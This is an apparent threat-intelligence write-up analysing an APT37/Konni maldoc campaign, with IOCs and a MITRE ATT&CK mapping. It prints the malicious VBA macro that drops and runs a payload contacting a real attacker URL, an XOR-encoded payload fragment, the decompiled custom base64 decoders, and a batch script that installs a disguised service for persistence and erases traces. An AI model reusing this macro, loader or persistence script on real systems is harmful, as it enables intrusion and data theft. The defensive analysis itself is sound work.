CyberThreatIntel/North Korea/APT/APT37/2020-04-23/Analysis.md
2020-04-23 16:51:17 +02:00

271 lines
13 KiB
Markdown

## APT 37 strike again
## Table of Contents
* [Malware analysis](#Malware-analysis)
* [Cyber kill chain](#Cyber-kill-chain)
* [Indicators Of Compromise (IOC)](#IOC)
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
* [Links](#Links)
+ [Original Tweet](#tweet)
+ [Link Anyrun](#Links-Anyrun)
+ [Articles](#Articles)
<h2>Malware analysis <a name="Malware-analysis"></a></h2>
<h6>The initial vector is an maldoc with a macro. This launches an auto-open method for decrypt the next stagger, save it and execute it in push as argument the URL to contact. This saves the modification on the document for avoiding to be executing a second time by the victim.</h6>
```vb
Private Sub Document_Open()
Dim n As Long
Dim cLine As String
Dim path As String
If Image1.Width > 2 And Image1.Height > 2 Then
Image1.Width = 1
Image1.Height = 1
Image2.AutoSize = True
With ActiveDocument.Content
.Font.ColorIndex = wdBlack
End With
path = save2file()
cLine = "cmd /c cd /d %USERPROFILE% && ren up.txt up.exe && up http://mydownload-202001.c1.biz"
n = Shell(cLine, vbHide)
End If
ActiveDocument.Save
End Sub
```
<h6>The called method parsed the data and xor by a common value used by North Korean ATP (0XFF). This saves the result on a file on the user profile executing the payload.</h6>
```vb
Function save2file() As String
Dim nIndex As Long
Dim path As String
Dim vbuffer As String
Dim output() As String
path = Environ("USERPROFILE")
path = path & "\up.txt"
vbuffer = "B2&A5&6F&FF&FC&FF&FF&FF&FB&FF&FF&FF&00&00&FF&FF&47&FF&FF&FF&FF&FF&FF&FF&BF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF"
[...]
vbuffer = vbuffer + "88&8C&8F&8D&96&91&8B&99&BE&FF&FF&FF&A9&9A&8D&AE&8A&9A&8D&86&A9&9E&93&8A&9A&A8&FF&FF&FF&6F&FF&FF&F3&FF&FF&FF&1D&C6&27&C4&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF"
output = Split(vbuffer, "&")
Open path For Binary As #1
For nIndex = LBound(output) To UBound(output)
Put #1, , CByte(("&H" & output(nIndex)) Xor &HFF)
Next nIndex
Close #1
save2file = path
End Function
```
<h6>The second stager executed is a PE (dll file) which is packed with UPX too. This checks the presence of the debugger and the architecture for download, the corresponding dat file.</h6>
<center><img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/North%20Korea/APT/APT37/2020-04-23/Pictures/entry_loader.png"></img></center>
<h6>The algorithm is a custom base64 with a key, this performs a loop which finds the corresponding reference of the index of the reference string (key). Once the done, this return a value and executed again for all the bytes of the payload are decrypted. Once this done, this writes the cab file on temp directory.</h6>
```asm
int32_t __cdecl Decrypt(int32_t arg_8h)
{
int32_t iVar1;
char cVar2;
char cVar3;
char cVar4;
char cVar5;
int32_t in_ECX;
int32_t in_EDX;
int32_t iVar6;
int32_t iVar7;
uint32_t var_14h;
int32_t var_10h;
int32_t var_ch;
int32_t var_8h;
int32_t var_4h;
iVar7 = 0;
iVar6 = 0;
do {
cVar2 = fcn.00402460("B2AwV4Ya1TqPoS-ReWsFGMCh!kmgtfJQD6iI5EUKdupv8Hbrzj7yl=LXnZcNO309x", (uint32_t)*(uint8_t *)(iVar7 + in_ECX));
cVar3 = fcn.00402460("B2AwV4Ya1TqPoS-ReWsFGMCh!kmgtfJQD6iI5EUKdupv8Hbrzj7yl=LXnZcNO309x", (uint32_t)*(uint8_t *)(iVar7 + 1 + in_ECX));
cVar4 = fcn.00402460("B2AwV4Ya1TqPoS-ReWsFGMCh!kmgtfJQD6iI5EUKdupv8Hbrzj7yl=LXnZcNO309x", (uint32_t)*(uint8_t *)(iVar7 + 2 + in_ECX));
cVar5 = fcn.00402460("B2AwV4Ya1TqPoS-ReWsFGMCh!kmgtfJQD6iI5EUKdupv8Hbrzj7yl=LXnZcNO309x", (uint32_t)*(uint8_t *)(iVar7 + 3 + in_ECX));
iVar7 = iVar7 + 4;
*(uint8_t *)(iVar6 + in_EDX) = cVar3 - 0x28U >> 4 | (cVar2 + -0x28) * '\x04';
iVar1 = iVar6 + 1;
if ((uint8_t)(cVar4 - 0x28U) != 0x40) {
*(uint8_t *)(iVar6 + 1 + in_EDX) = cVar4 - 0x28U >> 2 | (cVar3 - 0x28U) * '\x10';
iVar1 = iVar6 + 2;
}
iVar6 = iVar1;
if ((uint8_t)(cVar5 - 0x28U) != 0x40) {
*(uint8_t *)(iVar6 + in_EDX) = cVar4 << 6 | cVar5 - 0x28U;
iVar6 = iVar6 + 1;
}
} while (iVar7 < arg_8h);
return iVar6;
}
```
<h6>After this, the program bypass UAC is using a well-known method with access token impersonation routine in duplicates the token from one of the high integrity instances of Windows Update Standalone Installer (wusa.exe). This fileless UAC bypass is named “Cavalry” and comes from the leaks of "Vault7". This spawns a new cmd process for elevate their rights.</h6>
<center><img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/North%20Korea/APT/APT37/2020-04-23/Pictures/elevate_loader.png"></center>
<h6>The elevated prompt expands the cab file and launches the bat file. This stop this own service if already installed and running on the system. Check if the files exist on the system32 folder (already copied) for copy it. Once this, create a service for the persistence and elevate again theirs rights. Finally delete the loader and the files extracted on the temp folder as anti-forensic measures.</h6>
```bash
@echo off
sc stop WPrint > nul
echo %~dp0 | findstr /i "system32" > nul
if %ERRORLEVEL% equ 0 (goto INSTALL) else (goto COPYFILE)
:COPYFILE
copy /y "%~dp0\wprint.dll" %windir%\System32 > nul
del /f /q "%~dp0\wprint.dll" > nul
copy /y "%~dp0\wprint.ini" %windir%\System32 > nul
del /f /q "%~dp0\wprint.ini" > nul
:INSTALL
sc create WPrint binpath="%windir%\system32\svchost.exe -k WPrint" DisplayName="Windows Print Service" > nul
sc description WPrint "This service opens custom printer dialog boxes and handles notifications from a remote print server or a printer." > nul
sc config WPrint type=own start=auto error=normal binpath="%windir%\system32\svchost.exe -k WPrint" > nul
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v WPrint /t REG_MULTI_SZ /d "WPrint" /f > nul
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WPrint\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\system32\wprint.dll" /f > nul
sc start WPrint > nul
del /f /q "%USERPROFILE%\up.exe" > nul
del /f /q "%~dpnx0" > nul
```
<h6>The final implant begins by getting the content of ini file for get the configuration. This is also packed with UPX.</h6>
```asm
0x10002367 push 0x208 ; 520
0x1000236c push esi
0x1000236d mov ebx, 0x10006f38 ; '8o'
0x10002372 push ebx
0x10002373 mov dword [var_4h], esi
0x10002376 call fcn.100043c0
0x1000237b add esp, 0xc
0x1000237e push 0x104 ; 260
0x10002383 push ebx
0x10002384 push dword [0x10006cd0]
0x1000238a call dword [0x10006cf8]
0x10002390 mov edi, dword [sym.imp.SHLWAPI.dll_StrRChrW] ; 0x10005044
0x10002396 push str..ini ; 0x10005060 ; u".ini"
0x1000239b push 0x2e ; '.' ; 46
0x1000239d push esi
0x1000239e push ebx
0x1000239f call edi
0x100023a1 mov esi, dword [sym.imp.KERNEL32.DLL_lstrcpyW] ; 0x10005028
0x100023a7 push eax
0x100023a8 call esi
0x100023aa push 0x208 ; 520
0x100023af push 0
0x100023b1 push 0x10007158 ; 'Xq'
0x100023b6 call fcn.100043c0
0x100023bb add esp, 0xc
0x100023be push 0x104 ; 260
0x100023c3 push 0x10007158 ; 'Xq'
0x100023c8 push dword [0x10006cd0]
0x100023ce call dword [0x10006cf8]
0x100023d4 push str..dat ; 0x1000506c ; u".dat"
0x100023d9 push 0x2e ; '.' ; 46
0x100023db push 0
0x100023dd push 0x10007158 ; 'Xq'
0x100023e2 call edi
0x100023e4 push eax
0x100023e5 call esi
0x100023e7 xor esi, esi
```
<h6>The content of ini file is a single string encoded with the custom key.</h6>
```bash
gmRc4b2TFu6tLPHvkdsT3Q-UIGa0IbasFdIsFdSClw7cFdR1XPDD
```
<h6>We can note that the same algorithm (custom base 64) for decrypt the data is used but with different parameters and key. An another detail, the function with is used for getting the first occurrence is replaced by a Native function from the Windows Shell for the same structure of the algorithm base 64.</h6>
```asm
int32_t __cdecl fcn.1000203c(int32_t arg_8h)
{
int32_t iVar1;
char cVar2;
char cVar3;
char cVar4;
char cVar5;
int32_t in_ECX;
int32_t in_EDX;
int32_t iVar6;
int32_t iVar7;
undefined4 var_14h;
int32_t var_10h;
undefined4 var_ch;
undefined4 var_8h;
int32_t var_4h;
iVar7 = 0;
iVar6 = 0;
do {
cVar2 = (*_sym.imp.SHLWAPI.dll_StrChrA) ("aMob=%PmxS5FIZNV-ROA8BQY3Lgk4XliK1wGWrdj2CpJEUyTfs0qc6uv9tzh7HneD", (uint32_t)*(uint8_t *)(iVar7 + in_ECX));
cVar3 = (*_sym.imp.SHLWAPI.dll_StrChrA) ("aMob=%PmxS5FIZNV-ROA8BQY3Lgk4XliK1wGWrdj2CpJEUyTfs0qc6uv9tzh7HneD", (uint32_t)*(uint8_t *)(iVar7 + 1 + in_ECX));
cVar4 = (*_sym.imp.SHLWAPI.dll_StrChrA) ("aMob=%PmxS5FIZNV-ROA8BQY3Lgk4XliK1wGWrdj2CpJEUyTfs0qc6uv9tzh7HneD", (uint32_t)*(uint8_t *)(iVar7 + 2 + in_ECX));
cVar5 = (*_sym.imp.SHLWAPI.dll_StrChrA) ("aMob=%PmxS5FIZNV-ROA8BQY3Lgk4XliK1wGWrdj2CpJEUyTfs0qc6uv9tzh7HneD", (uint32_t)*(uint8_t *)(iVar7 + 3 + in_ECX));
iVar7 = iVar7 + 4;
*(uint8_t *)(iVar6 + in_EDX) = cVar3 - 0x30U >> 4 | (cVar2 + -0x30) * '\x04';
iVar1 = iVar6 + 1;
if ((uint8_t)(cVar4 - 0x30U) != 0x40) {
*(uint8_t *)(iVar6 + 1 + in_EDX) = cVar4 - 0x30U >> 2 | cVar3 << 4;
iVar1 = iVar6 + 2;
}
iVar6 = iVar1;
if ((uint8_t)(cVar5 - 0x30U) != 0x40) {
*(uint8_t *)(iVar6 + in_EDX) = cVar4 << 6 | cVar5 - 0x30U;
iVar6 = iVar6 + 1;
}
} while (iVar7 < arg_8h);
return iVar6;
}
```
<h6>Once the strings decrypted, this adds a new reference of the codepage for the console stream (UTF8).</h6>
```bash
REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f
```
<h6>After sleep the process as anti-sandbox measure, this uses the URL for download the last file (4.dat) which contents, the credentials for sending to the FTP. Finally, the implant sends the system informations, list of files by FTP encoded with the custom base64 algorithm.</h6>
<h6>On the TTPs, we can note the differences compared to the TTPs observed at the end of 2019, the main differences are in bitwise operations in custom base 64 and the use of an XOR (0xFF) instead of certutil for decode the base 64 payload.In using this XOR method with this value would leave it possible that Lazarus shared one of their tools for macro editing, some parts of the code matched with parts of code used from the campagne the last year. Here, we can see TTPs from the Medium article (2019 - cf. Links):</h6>
<center><img src="https://miro.medium.com/max/1400/1*CfSltI6XAjK-X9tb9J2FvQ.png" legend="TTPs from the Medium article (cf. Links)"></img></center>
<h2> Cyber kill chain <a name="Cyber-kill-chain"></a></h2>
<h6>This process graph represent the cyber kill chain used by the attacker.</h6>
<center>
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/North%20Korea/APT/APT37/2020-04-23/Pictures/killchain.png"></img>
</center>
<h2> Indicators Of Compromise (IOC) <a name="IOC"></a></h2>
<h6> The IOC can be exported in <a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/North%20Korea/APT/APT37/2020-04-23/JSON/IOC-Konni_2020_04-23.json">JSON</a> and <a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/North%20Korea/APT/APT37/2020-04-23/CSV/IOC-Konni_2020_04-23.csv">CSV</a></h6>
<h2> References MITRE ATT&CK Matrix <a name="Ref-MITRE-ATTACK"></a></h2>
|Enterprise tactics|Technics used|Ref URL|
| :---------------: |:-------------| :------------- |
|Execution|Command-Line Interface<br>Execution through API|https://attack.mitre.org/techniques/T1059/<br>https://attack.mitre.org/techniques/T1106/|
|Persistence|Modify Existing Service<br>New Service|https://attack.mitre.org/techniques/T1031/<br>https://attack.mitre.org/techniques/T1050/|
|Privilege Escalation|New Service|https://attack.mitre.org/techniques/T1050/|
|Defense Evasion|Modify Registry</br>Deobfuscate/Decode Files or Information|https://attack.mitre.org/techniques/T1112/</br>https://attack.mitre.org/techniques/T1140/|
|Discovery|System Service Discovery<br>Query Registry|https://attack.mitre.org/techniques/T1007/<br>https://attack.mitre.org/techniques/T1012/|
|Command And Control|Custom Cryptographic Protocol|https://attack.mitre.org/techniques/T1024/|
<h6> This can be exported as JSON format <a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/North%20Korea/APT/APT37/2020-04-23/JSON/Mitre-Konni_2020_04-23.json">Export in JSON</a></h6>
<h2>Links <a name="Links"></a></h2>
<h6> Original tweet: </h6><a name="tweet"></a>
* [https://twitter.com/Timele9527/status/1252446369987432449](https://twitter.com/Timele9527/status/1252446369987432449)
<h6> Links Anyrun: <a name="Links-Anyrun"></a></h6>
* [guidance.doc](https://app.any.run/tasks/c4961742-886d-4024-a097-209d769eb45f/)
<h6>Articles <a name="Articles"></a></h6>
+ [A Look Into Konni 2019 Campaign](https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b)
+ [SYSCON Backdoor Uses FTP as a C&C Channel)](https://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/)